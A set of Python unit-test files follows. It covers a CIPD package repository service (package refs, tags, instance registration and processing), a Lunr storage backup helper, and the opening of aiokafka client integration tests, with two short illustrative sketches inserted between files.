self.assertTrue(impl.is_valid_package_ref('ref')) self.assertTrue(impl.is_valid_package_ref('abc-_0123')) self.assertFalse(impl.is_valid_package_ref('')) self.assertFalse(impl.is_valid_package_ref('no-CAPS')) self.assertFalse(impl.is_valid_package_ref('a'*500)) # Tags are not refs. self.assertFalse(impl.is_valid_package_ref('key:value')) self.assertFalse(impl.is_valid_package_ref('key:')) # Instance IDs are not refs. 
self.assertFalse(impl.is_valid_package_ref('a'*40)) def test_is_valid_instance_tag(self): self.assertTrue(impl.is_valid_instance_tag('k:v')) self.assertTrue(impl.is_valid_instance_tag('key:')) self.assertTrue(impl.is_valid_instance_tag('key-_01234:#$%@\//%$SD')) self.assertFalse(impl.is_valid_instance_tag('')) self.assertFalse(impl.is_valid_instance_tag('key')) self.assertFalse(impl.is_valid_instance_tag('KEY:')) self.assertFalse(impl.is_valid_instance_tag('key:' + 'a'*500)) class TestRepoService(testing.AppengineTestCase): maxDiff = None def setUp(self): super(TestRepoService, self).setUp() self.mocked_cas_service = MockedCASService() self.mock(impl.cas, 'get_cas_service', lambda: self.mocked_cas_service) self.service = impl.get_repo_service() def register_fake_instance(self, pkg_name): _, registered = self.service.register_instance( package_name=pkg_name, instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) def test_list_packages_no_path(self): self.assertIsNone(self.service.get_package('a/b')) self.assertIsNone(self.service.get_package('y/z')) self.register_fake_instance('y/z') self.register_fake_instance('a/b') self.assertEqual(([], ['a', 'y']), self.service.list_packages('', False)) self.assertEqual((['a/b', 'y/z'], ['a', 'y']), self.service.list_packages('', True)) def test_list_packages_with_path(self): self.assertIsNone(self.service.get_package('a/b')) self.assertIsNone(self.service.get_package('y/x')) self.assertIsNone(self.service.get_package('y/z/z')) self.register_fake_instance('y/x') self.register_fake_instance('y/z/z') self.register_fake_instance('a/b') self.assertEqual((['y/x'], ['y/z']), self.service.list_packages('y', False)) self.assertEqual((['y/z/z'], []), self.service.list_packages('y/z/z', False)) self.assertEqual((['y/x'], ['y/z']), self.service.list_packages('y/', False)) self.assertEqual((['y/x', 'y/z/z'], ['y/z']), self.service.list_packages('y', True)) def test_list_packages_ignore_substrings(self): self.assertIsNone(self.service.get_package('good/path')) self.register_fake_instance('good/path') self.assertEqual((['good/path'], []), self.service.list_packages('good', False)) self.assertEqual((['good/path'], []), self.service.list_packages('good/', False)) self.assertEqual(([], []), self.service.list_packages('goo', False)) def test_list_packages_where_a_package_is_also_a_directory(self): self.assertIsNone(self.service.get_package('good')) self.assertIsNone(self.service.get_package('good/path')) self.register_fake_instance('good') self.register_fake_instance('good/path') self.assertEqual((['good'], ['good']), self.service.list_packages('', False)) self.assertEqual((['good', 'good/path'], ['good']), self.service.list_packages('', True)) # To keep things simple we match packages with names matching the search # with the trailing slash stripped. 
self.assertEqual((['good', 'good/path'], []), self.service.list_packages('good/', False)) def test_list_packages_with_an_empty_directory(self): self.assertIsNone(self.service.get_package('good/sub/path')) self.register_fake_instance('good/sub/path') self.assertEqual(([], ['good/sub']), self.service.list_packages('good', False)) self.assertEqual((['good/sub/path'], ['good/sub']), self.service.list_packages('good', True)) self.assertEqual((['good/sub/path'], ['good', 'good/sub']), self.service.list_packages('', True)) def test_register_instance_new(self): self.assertIsNone(self.service.get_instance('a/b', 'a'*40)) self.assertIsNone(self.service.get_package('a/b')) inst, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) self.assertEqual( ndb.Key('Package', 'a/b', 'PackageInstance', 'a'*40), inst.key) self.assertEqual('a/b', inst.package_name) self.assertEqual('a'*40, inst.instance_id) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': [], 'processors_pending': [], 'processors_success': [], } self.assertEqual(expected, inst.to_dict()) self.assertEqual( expected, self.service.get_instance('a/b', 'a'*40).to_dict()) pkg = self.service.get_package('a/b') self.assertTrue(pkg) self.assertEqual('a/b', pkg.package_name) def test_register_instance_existing(self): # First register a package. inst1, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com')) self.assertTrue(registered) # Try to register it again. inst2, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:def@example.com')) self.assertFalse(registered) self.assertEqual(inst1.to_dict(), inst2.to_dict()) def test_generate_fetch_url(self): inst, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) url = self.service.generate_fetch_url(inst) self.assertEqual( 'https://signed-url/SHA1/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', url) def test_is_instance_file_uploaded(self): self.mocked_cas_service.uploaded[('SHA1', 'a'*40)] = '' self.assertTrue(self.service.is_instance_file_uploaded('a/b', 'a'*40)) self.assertFalse(self.service.is_instance_file_uploaded('a/b', 'b'*40)) def test_create_upload_session(self): upload_url, upload_session_id = self.service.create_upload_session( 'a/b', 'a'*40, auth.Identity.from_bytes('user:abc@example.com')) self.assertEqual('http://upload_url', upload_url) self.assertEqual('upload_session_id', upload_session_id) def test_register_instance_with_processing(self): self.mock(utils, 'utcnow', lambda: datetime.datetime(2014, 1, 1)) self.service.processors.append(MockedProcessor('bad', 'Error message')) self.service.processors.append(MockedProcessor('good')) tasks = [] def mocked_enqueue_task(**kwargs): tasks.append(kwargs) return True self.mock(impl.utils, 'enqueue_task', mocked_enqueue_task) # The processors are added to the pending list. 
inst, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': [], 'processors_pending': ['bad', 'good'], 'processors_success': [], } self.assertEqual(expected, inst.to_dict()) # The processing task is enqueued. self.assertEqual([{ 'payload': '{"instance_id": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", ' '"package_name": "a/b", "processors": ["bad", "good"]}', 'queue_name': 'cipd-process', 'transactional': True, 'url': '/internal/taskqueue/cipd-process/' 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', }], tasks) # Now execute the task. self.service.process_instance( package_name='a/b', instance_id='a'*40, processors=['bad', 'good']) # Assert the final state. inst = self.service.get_instance('a/b', 'a'*40) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': ['bad'], 'processors_pending': [], 'processors_success': ['good'], } self.assertEqual(expected, inst.to_dict()) good_result = self.service.get_processing_result('a/b', 'a'*40, 'good') self.assertEqual({ 'created_ts': datetime.datetime(2014, 1, 1), 'error': None, 'result': { 'instance_id': 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', 'package_name': 'a/b', 'processor_name': 'good', }, 'success': True, }, good_result.to_dict()) bad_result = self.service.get_processing_result('a/b', 'a'*40, 'bad') self.assertEqual({ 'created_ts': datetime.datetime(2014, 1, 1), 'error': 'Error message', 'result': None, 'success': False, }, bad_result.to_dict()) def test_client_binary_extraction(self): self.mock(utils, 'utcnow', lambda: datetime.datetime(2014, 1, 1)) # Prepare fake cipd binary package. out = StringIO.StringIO() zf = zipfile.ZipFile(out, 'w', zipfile.ZIP_DEFLATED) zf.writestr('cipd', 'cipd binary data here') zf.close() zipped = out.getvalue() digest = hashlib.sha1(zipped).hexdigest() # Pretend it is uploaded. self.mocked_cas_service.uploaded[('SHA1', digest)] = zipped # Register it as a package instance. self.mock(impl.utils, 'enqueue_task', lambda **_args: True) inst, registered = self.service.register_instance( package_name='infra/tools/cipd/linux-amd64', instance_id=digest, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': [], 'processors_pending': ['cipd_client_binary:v1'], 'processors_success': [], } self.assertEqual(expected, inst.to_dict()) # get_client_binary_info indicated that processing is not done yet. instance = self.service.get_instance( package_name='infra/tools/cipd/linux-amd64', instance_id=digest) info, error_msg = self.service.get_client_binary_info(instance) self.assertIsNone(info) self.assertIsNone(error_msg) # Execute post-processing task: it would extract CIPD binary. self.service.process_instance( package_name='infra/tools/cipd/linux-amd64', instance_id=digest, processors=['cipd_client_binary:v1']) # Ensure succeeded. 
result = self.service.get_processing_result( package_name='infra/tools/cipd/linux-amd64', instance_id=digest, processor_name='cipd_client_binary:v1') self.assertEqual({ 'created_ts': datetime.datetime(2014, 1, 1, 0, 0), 'success': True, 'error': None, 'result': { 'client_binary': { 'hash_algo': 'SHA1', 'hash_digest': '5a72c1535f8d132c341585207504d94e68ef8a9d', 'size': 21, }, }, }, result.to_dict()) # Verify get_client_binary_info works too. instance = self.service.get_instance( package_name='infra/tools/cipd/linux-amd64', instance_id=digest) info, error_msg = self.service.get_client_binary_info(instance) expected = impl.ClientBinaryInfo( sha1='5a72c1535f8d132c341585207504d94e68ef8a9d', size=21, fetch_url=( 'https://signed-url/SHA1/5a72c1535f8d132c341585207504d94e68ef8a9d')) self.assertIsNone(error_msg) self.assertEqual(expected, info) def test_client_binary_extract_failure(self): self.mock(utils, 'utcnow', lambda: datetime.datetime(2014, 1, 1)) # Pretend some fake data is uploaded. self.mocked_cas_service.uploaded[('SHA1', 'a'*40)] = 'not a zip' # Register it as a package instance. self.mock(impl.utils, 'enqueue_task', lambda **_args: True) inst, registered = self.service.register_instance( package_name='infra/tools/cipd/linux-amd64', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': [], 'processors_pending': ['cipd_client_binary:v1'], 'processors_success': [], } self.assertEqual(expected, inst.to_dict()) # Execute post-processing task: it would fail extracting CIPD binary. self.service.process_instance( package_name='infra/tools/cipd/linux-amd64', instance_id='a'*40, processors=['cipd_client_binary:v1']) # Ensure error is reported. result = self.service.get_processing_result( package_name='infra/tools/cipd/linux-amd64', instance_id='a'*40, processor_name='cipd_client_binary:v1') self.assertEqual({ 'created_ts': datetime.datetime(2014, 1, 1, 0, 0), 'success': False, 'error': 'File is not a zip file', 'result': None, }, result.to_dict()) # Verify get_client_binary_info reports it too. instance = self.service.get_instance( package_name='infra/tools/cipd/linux-amd64', instance_id='a'*40) info, error_msg = self.service.get_client_binary_info(instance) self.assertIsNone(info) self.assertEqual( 'Failed to extract the binary: File is not a zip file', error_msg) def test_set_package_ref(self): ident1 = auth.Identity.from_bytes('user:abc@example.com') now1 = datetime.datetime(2015, 1, 1, 0, 0) ident2 = auth.Identity.from_bytes('user:def@example.com') now2 = datetime.datetime(2016, 1, 1, 0, 0) self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=ident1, now=datetime.datetime(2014, 1, 1, 0, 0)) self.service.register_instance( package_name='a/b', instance_id='b'*40, caller=ident1, now=datetime.datetime(2014, 1, 1, 0, 0)) ref = self.service.set_package_ref('a/b', 'ref', 'a'*40, ident1, now1) self.assertEqual({ 'instance_id': 'a'*40, 'modified_by': ident1, 'modified_ts': now1, }, ref.to_dict()) # Move to the same value -> modified_ts do not change. ref = self.service.set_package_ref('a/b', 'ref', 'a'*40, ident2, now2) self.assertEqual({ 'instance_id': 'a'*40, 'modified_by': ident1, 'modified_ts': now1, }, ref.to_dict()) # Move to another value. 
ref = self.service.set_package_ref('a/b', 'ref', 'b'*40, ident2, now2) self.assertEqual({ 'instance_id': 'b'*40, 'modified_by': ident2, 'modified_ts': now2, }, ref.to_dict()) # Code coverage for package_name. self.assertEqual('a/b', ref.package_name) def test_attach_detach_tags(self): _, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) # Add a tag. attached = self.service.attach_tags( package_name='a/b', instance_id='a'*40, tags=['tag1:value1'], caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertEqual( { 'tag1:value1': { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'tag': 'tag1:value1', }, }, {k: e.to_dict() for k, e in attached.iteritems()}) self.assertEqual('a/b', attached['tag1:value1'].package_name) self.assertEqual('a'*40, attached['tag1:value1'].instance_id) # Attempt to attach existing one (and one new). attached = self.service.attach_tags( package_name='a/b', instance_id='a'*40, tags=['tag1:value1', 'tag2:value2'], caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2015, 1, 1, 0, 0)) self.assertEqual( { 'tag1:value1': { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), # Didn't change to 2015. 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'tag': 'tag1:value1', }, 'tag2:value2': { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2015, 1, 1, 0, 0), 'tag': 'tag2:value2', }, }, {k: e.to_dict() for k, e in attached.iteritems()}) # Get specific tags. tags = self.service.get_tags('a/b', 'a'*40, ['tag1:value1', 'missing:']) self.assertEqual( { 'tag1:value1': { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'tag': 'tag1:value1', }, 'missing:': None, }, {k: e.to_dict() if e else None for k, e in tags.iteritems()}) # Get all tags. Newest first. tags = self.service.query_tags('a/b', 'a'*40) self.assertEqual(['tag2:value2', 'tag1:value1'], [t.tag for t in tags]) # Search by specific tag (in a package). found = self.service.search_by_tag('tag1:value1', package_name='a/b') self.assertEqual( [('a/b', 'a'*40)], [(e.package_name, e.instance_id) for e in found]) # Search by specific tag (globally). Use callback to cover this code path. found = self.service.search_by_tag('tag1:value1') self.assertEqual( [('a/b', 'a'*40)], [(e.package_name, e.instance_id) for e in found]) # Cover callback usage. found = self.service.search_by_tag( 'tag1:value1', callback=lambda *_a: False) self.assertFalse(found) # Remove tag, search again -> missing. 
self.service.detach_tags('a/b', 'a'*40, ['tag1:value1', 'missing:']) found = self.service.search_by_tag('tag1:value1') self.assertFalse(found) def add_tagged_instance(self, package_name, instance_id, tags): self.service.register_instance( package_name=package_name, instance_id=instance_id, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.service.attach_tags( package_name=package_name, instance_id=instance_id, tags=tags, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) def test_resolve_version(self): self.add_tagged_instance('a/b', 'a'*40, ['tag1:value1', 'tag2:value2']) self.add_tagged_instance('a/b', 'b'*40, ['tag1:value1']) self.add_tagged_instance('a/b', 'c'*40, ['tag1:value1']) self.service.set_package_ref( 'a/b', 'ref', 'a'*40, auth.Identity.from_bytes('user:abc@example.com')) self.assertEqual([], self.service.resolve_version('a/b', 'd'*40, 2)) self.assertEqual([], self.service.resolve_version('a/b', 'tag3:', 2)) self.assertEqual([], self.service.resolve_version('a/b/c/d', 'a'*40, 2)) self.assertEqual([], self.service.resolve_version('a/b', 'not-such-ref', 2)) self.assertEqual(['a'*40], self.service.resolve_version('a/b', 'ref', 2)) self.assertEqual(['a'*40], self.service.resolve_version('a/b', 'a'*40, 2)) self.assertEqual( ['a'*40], self.service.resolve_version('a/b', 'tag2:value2', 2)) # No order guarantees when multiple results match. res = self.service.resolve_version('a/b', 'tag1:value1', 2) self.assertEqual(2, len(res)) self.assertTrue(set(['a'*40, 'b'*40, 'c'*40]).issuperset(res)) class MockedCASService(object): def __init__(self): self.uploaded = {} def is_fetch_configured(self): return True def generate_fetch_url(self, algo, digest): return 'https://signed-url/%s/%s' % (algo, digest) def is_object_present(self, algo, digest): return (algo, digest) in self.uploaded def create_upload_session(self, _algo, _digest, _caller): class UploadSession(object): upload_url = 'http://upload_url' return UploadSession(), 'upload_session_id' def open(self, hash_algo, hash_digest, read_buffer_size): assert read_buffer_size > 0 if not self.is_object_present(hash_algo, hash_digest): # pragma: no cover raise cas_impl.NotFoundError() return StringIO.StringIO(self.uploaded[(hash_algo, hash_digest)]) def start_direct_upload(self, hash_algo): assert hash_algo == 'SHA1' return cas_impl.DirectUpload( file_obj=StringIO.StringIO(), hasher=hashlib.sha1(), callback=lambda *_args: None) class MockedProcessor(processing.Processor): def __init__(self, name, error=None): self.name = name self.error = error def should_process(self, instance): return True def run(self, instance, data): if self.error: raise processing.ProcessingError(self.error) return { 'instance_id': instance.instance_id, 'package_name': instance.package_name, 'processor_name': self.name, }
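

# Editorial sketch, not part of the service under test: one way a caller could
# distinguish the three version forms accepted by resolve_version() above,
# reusing the validators exercised in TestValidators. The classify_version()
# helper itself is invented for illustration.
def classify_version(version):
    """Return 'instance_id', 'tag' or 'ref' for a version string."""
    if impl.is_valid_instance_id(version):
        return 'instance_id'
    if impl.is_valid_instance_tag(version):
        return 'tag'
    if impl.is_valid_package_ref(version):
        return 'ref'
    raise ValueError('unrecognized version format: %r' % version)


class TestClassifyVersionSketch(unittest.TestCase):

    def test_classify_version(self):
        self.assertEqual('instance_id', classify_version('a'*40))
        self.assertEqual('tag', classify_version('tag1:value1'))
        self.assertEqual('ref', classify_version('ref'))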
#!/usr/bin/env python # Copyright (c) 2011-2016 Rackspace US, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from contextlib import contextmanager from tempfile import mkdtemp from shutil import rmtree import os import sys import json import fcntl from time import sleep import logging from lunr.storage.helper.utils import jobs, ServiceUnavailable from lunr.storage.helper.utils.manifest import Manifest from lunr.storage.helper.utils.worker import Block from lunr.storage.helper import backup from lunr.storage.helper.utils.client import get_conn from lunr.storage.helper.utils.client import memory from lunr.common.config import LunrConfig from lunr.storage.helper.utils import NotFound from testlunr.unit import MockResourceLock, patch from lunr.storage.helper.utils.worker import BlockReadFailed logging.basicConfig() # from lunr.common import logger # logger.configure(log_to_console=True, capture_stdio=False) LOCKS = {} def _spawn(lock_file, job, *args, **kwargs): def run_job(): LOCKS[lock_file] = True try: callback = kwargs.pop('callback', lambda: None) error_callback = kwargs.pop('error_callback', lambda: None) skip_fork = kwargs.pop('skip_fork', None) try: job(*args, **kwargs) except: error_callback() return 1 callback() finally: try: del LOCKS[lock_file] except KeyError: pass if lock_file in LOCKS: raise jobs.JobAlreadyRunningError() _spawn.run_job = run_job return @contextmanager def mock_spawn(): _orig_spawn = backup.spawn try: backup.spawn = _spawn yield _spawn finally: backup.spawn = _orig_spawn class TestBackupHelper(unittest.TestCase): def setUp(self): memory.reset() self.scratch = mkdtemp() self.run_dir = os.path.join(self.scratch, 'run') self.backup_dir = os.path.join(self.scratch, 'backups') os.mkdir(self.backup_dir) self.conf = LunrConfig({ 'storage': {'run_dir': self.run_dir, 'skip_fork': True}, 'backup': {'client': 'disk'}, 'disk': {'path': self.backup_dir} }) def tearDown(self): rmtree(self.scratch) def test_get(self): snapshot = { 'id': 'test_snapshot', 'origin': 'test_volume' } backup_id = 'test_backup' info = { 'asdf': 42, 'id': backup_id, 'pid': os.getpid(), } h = backup.BackupHelper(self.conf) lock_file = h._resource_file(snapshot['id']) spawning_dir = os.path.dirname(lock_file) os.makedirs(spawning_dir) with open(lock_file, "w") as f: f.write(json.dumps(info)) # self.assertRaises(NotFound, h.get, snapshot, backup_id) backup_info = h.get(snapshot, backup_id) self.assertEquals(backup_info['lock'], lock_file) self.assertEquals(backup_info['status'], 'RUNNING') def test_get_with_junk_info(self): snapshot = { 'id': 'test_snapshot', 'origin': 'test_volume' } backup_id = 'test_backup' h = backup.BackupHelper(self.conf) lock_file = h._resource_file(snapshot['id']) spawning_dir = os.path.dirname(lock_file) os.makedirs(spawning_dir) with open(lock_file, "w") as f: f.write('THIS IS NOT JSON') self.assertRaises(NotFound, h.get, snapshot, backup_id) def test_create_first_backup_for_new_volume(self): h = backup.BackupHelper(self.conf) def callback(): callback.ran = True snapshot 
= { 'id': 'bak1', 'timestamp': 1.0, } snapshot['path'] = os.path.join(self.scratch, 'bak1') snapshot['origin'] = 'vol1' snapshot['size'] = 4 * 1024 * 1024 with open(snapshot['path'], 'w') as f: f.write('\x00' * snapshot['size']) backup_id = 'backup1' with mock_spawn() as j: h.create(snapshot, backup_id, callback) j.run_job() self.assert_(callback.ran) conn = get_conn(self.conf) _headers, raw_json_string = conn.get_object('vol1', 'manifest', newest=True) m = Manifest.loads(raw_json_string) self.assertEquals(m.block_count, 1) self.assertEquals(m.backups['backup1'], 1.0) self.assertEquals(m.history, [1.0]) self.assert_(isinstance(m[m.history[0]], list)) stats_path = h._stats_file('vol1') self.assertFalse(os.path.exists(stats_path)) def test_create_fail_ioerror(self): h = backup.BackupHelper(self.conf) def callback(): callback.ran = True callback.ran = False def error_callback(): error_callback.ran = True error_callback.ran = False snapshot = { 'id': 'bak1', 'timestamp': 1.0, } snapshot['path'] = os.path.join(self.scratch, 'bak1') snapshot['origin'] = 'vol1' snapshot['size'] = 4 * 1024 * 1024 with open(snapshot['path'], 'w') as f: f.write('\x00' * snapshot['size']) backup_id = 'backup1' def fake_hydrate(junk): raise BlockReadFailed("cant read!") with patch(Block, "_hydrate", fake_hydrate): h.create(snapshot, backup_id, callback=callback, error_callback=error_callback, lock=MockResourceLock()) self.assertFalse(callback.ran) self.assertTrue(error_callback.ran) stats_path = h._stats_file('vol1') self.assertFalse(os.path.exists(stats_path)) def test_create_first_backup_create_container(self): h = backup.BackupHelper(self.conf) conn = get_conn(self.conf) _orig_put_container = conn.put_container def mock_put_container(*args, **kwargs): # force the race sleep(0.2) mock_put_container.called.append(*args, **kwargs) _orig_put_container(*args, **kwargs) conn.put_container = mock_put_container mock_put_container.called = [] with patch(backup, 'get_conn', lambda *args: conn): snapshot = { 'id': 'bak1', 'timestamp': 1.0, } snapshot['path'] = os.path.join(self.scratch, 'bak1') snapshot['origin'] = 'vol1' snapshot['size'] = 16 * 1024 ** 2 with open(snapshot['path'], 'w') as f: f.write('\x00') f.seek(4 * 1024 ** 2, 1) f.write('\x01') f.seek(4 * 1024 ** 2, 1) f.write('\x02') backup_id = 'backup1' with mock_spawn() as j: h.create(snapshot, backup_id, lambda *args, **kwargs: None) j.run_job() # return doesn't matter, check it doesn't raise ClientException _headers, listing = conn.get_container(snapshot['origin']) # wrote 3 blocks + manifest. self.assertEquals(len(listing), 4) self.assertEquals(len(mock_put_container.called), 1) stats_path = h._stats_file('vol1') self.assertFalse(os.path.exists(stats_path)) def test_status(self): self.conf = LunrConfig({ 'storage': {'run_dir': self.run_dir, 'skip_fork': True}, 'backup': {'client': 'memory'}, }) h = backup.BackupHelper(self.conf) expected = {'client': 'memory', 'containers': 0, 'objects': 0} self.assertEquals(h.status(), expected) def test_status_client_exception(self): h = backup.BackupHelper(self.conf) conn = get_conn(self.conf) def mock_head_account(*args, **kwargs): raise conn.ClientException('unable to connect') conn.head_account = mock_head_account with patch(backup, 'get_conn', lambda *args: conn): self.assertRaises(ServiceUnavailable, h.status) def test_prune_no_manifest(self): h = backup.BackupHelper(self.conf) volume = {'id': 'vol1', 'size': 1} backup_id = 'unused' h.prune(volume, backup_id) # Shouldn't blow up on missing mainfest. 
        self.assert_(True)

    def test_prune_missing_backup_id(self):
        h = backup.BackupHelper(self.conf)
        volume = {'id': 'vol1', 'size': 1}
        existing_backup_id = 'backup1'
        missing_backup_id = 'something_else'
        m = Manifest.blank(volume['size'])
        b = m.create_backup(existing_backup_id, timestamp=1.0)
        for i in range(volume['size']):
            b[i] = '00'
        conn = get_conn(self.conf)
        conn.put_container('vol1')
        conn.put_object('vol1', '00', 'asdf')
        conn.put_object('vol1', 'manifest', m.dumps())
        h.prune(volume, missing_backup_id)
        # Shouldn't blow up on missing backup_id.
        self.assert_(True)

    def test_audit_no_manifest(self):
        h = backup.BackupHelper(self.conf)
        volume = {'id': 'vol1', 'size': 1}
        h.audit(volume)


if __name__ == "__main__":
    unittest.main()
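# ----------------------------------------------------------------------
# Illustrative sketch (not part of the suite above): mock_spawn() in these
# tests swaps backup.spawn for a stub that records the job instead of
# forking, so a test can run the captured job synchronously and then
# assert on its callbacks. A minimal, generic version of that pattern,
# using only the standard library and hypothetical names (fake_module,
# capture_spawn), might look like this:
# ----------------------------------------------------------------------
import unittest
from contextlib import contextmanager
from types import SimpleNamespace

# Stand-in for a module that exposes a forking spawn(); the real one would
# run the job in another process.
fake_module = SimpleNamespace(spawn=lambda lock_file, job, *args, **kwargs: None)


@contextmanager
def capture_spawn(module):
    """Temporarily replace module.spawn with a recorder exposing run_job()."""
    captured = SimpleNamespace(run_job=None)

    def fake_spawn(lock_file, job, *args, **kwargs):
        callback = kwargs.pop('callback', lambda: None)

        def run_job():
            job(*args, **kwargs)
            callback()

        captured.run_job = run_job  # let the test decide when to run the job

    original = module.spawn
    module.spawn = fake_spawn
    try:
        yield captured
    finally:
        module.spawn = original


class TestCaptureSpawn(unittest.TestCase):
    def test_job_runs_synchronously(self):
        ran = []
        with capture_spawn(fake_module) as captured:
            fake_module.spawn('/tmp/lock', ran.append, 'done',
                              callback=lambda: ran.append('callback'))
            self.assertEqual(ran, [])  # nothing has run yet
            captured.run_job()         # drive the "spawned" job inline
        self.assertEqual(ran, ['done', 'callback'])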
import asyncio import socket import types from typing import Any from unittest import mock from kafka.errors import ( KafkaError, KafkaConnectionError, RequestTimedOutError, NodeNotReadyError, UnrecognizedBrokerVersion ) from kafka.protocol.metadata import ( MetadataRequest_v0 as MetadataRequest, MetadataResponse_v0 as MetadataResponse) from kafka.protocol.fetch import FetchRequest_v0 from aiokafka import __version__ from aiokafka.client import AIOKafkaClient, ConnectionGroup, CoordinationType from aiokafka.conn import AIOKafkaConnection, CloseReason from aiokafka.util import create_task, get_running_loop from ._testutil import ( KafkaIntegrationTestCase, run_until_complete, kafka_versions ) NO_ERROR = 0 UNKNOWN_TOPIC_OR_PARTITION = 3 NO_LEADER = 5 REPLICA_NOT_AVAILABLE = 9 INVALID_TOPIC = 17 UNKNOWN_ERROR = -1 TOPIC_AUTHORIZATION_FAILED = 29 class TestKafkaClientIntegration(KafkaIntegrationTestCase): @run_until_complete async def test_init_with_list(self): client = AIOKafkaClient(bootstrap_servers=[ '127.0.0.1:9092', '127.0.0.2:9092', '127.0.0.3:9092']) self.assertEqual( f'<AIOKafkaClient client_id=aiokafka-{__version__}>', client.__repr__()) self.assertEqual( sorted([('127.0.0.1', 9092, socket.AF_INET), ('127.0.0.2', 9092, socket.AF_INET), ('127.0.0.3', 9092, socket.AF_INET)]), sorted(client.hosts)) node = client.get_random_node() self.assertEqual(node, None) # unknown cluster metadata @run_until_complete async def test_init_with_csv(self): client = AIOKafkaClient( bootstrap_servers='127.0.0.1:9092,127.0.0.2:9092,127.0.0.3:9092') self.assertEqual( sorted([('127.0.0.1', 9092, socket.AF_INET), ('127.0.0.2', 9092, socket.AF_INET), ('127.0.0.3', 9092, socket.AF_INET)]), sorted(client.hosts)) @run_until_complete async def test_load_metadata(self): brokers = [ (0, 'broker_1', 4567), (1, 'broker_2', 5678) ] topics = [ (NO_ERROR, 'topic_1', [ (NO_ERROR, 0, 1, [1, 2], [1, 2]) ]), (NO_ERROR, 'topic_2', [ (NO_LEADER, 0, -1, [], []), (NO_LEADER, 1, 1, [], []), ]), (NO_LEADER, 'topic_no_partitions', []), (UNKNOWN_TOPIC_OR_PARTITION, 'topic_unknown', []), (NO_ERROR, 'topic_3', [ (NO_ERROR, 0, 0, [0, 1], [0, 1]), (NO_ERROR, 1, 1, [1, 0], [1, 0]), (NO_ERROR, 2, 0, [0, 1], [0, 1]) ]), (NO_ERROR, 'topic_4', [ (NO_ERROR, 0, 0, [0, 1], [0, 1]), (REPLICA_NOT_AVAILABLE, 1, 1, [1, 0], [1, 0]), ]), (INVALID_TOPIC, 'topic_5', []), # Just ignored (UNKNOWN_ERROR, 'topic_6', []), # Just ignored (TOPIC_AUTHORIZATION_FAILED, 'topic_auth_error', []), ] async def send(request_id): return MetadataResponse(brokers, topics) mocked_conns = {(0, 0): mock.MagicMock()} mocked_conns[(0, 0)].send.side_effect = send client = AIOKafkaClient(bootstrap_servers=['broker_1:4567']) task = create_task(client._md_synchronizer()) client._conns = mocked_conns client.cluster.update_metadata(MetadataResponse(brokers[:1], [])) await client.force_metadata_update() task.cancel() md = client.cluster c_brokers = md.brokers() self.assertEqual(len(c_brokers), 2) expected_brokers = [ (0, 'broker_1', 4567, None), (1, 'broker_2', 5678, None) ] self.assertEqual(sorted(expected_brokers), sorted(list(c_brokers))) c_topics = md.topics() self.assertEqual(len(c_topics), 4) self.assertEqual(md.partitions_for_topic('topic_1'), {0}) self.assertEqual(md.partitions_for_topic('topic_2'), {0, 1}) self.assertEqual(md.partitions_for_topic('topic_3'), {0, 1, 2}) 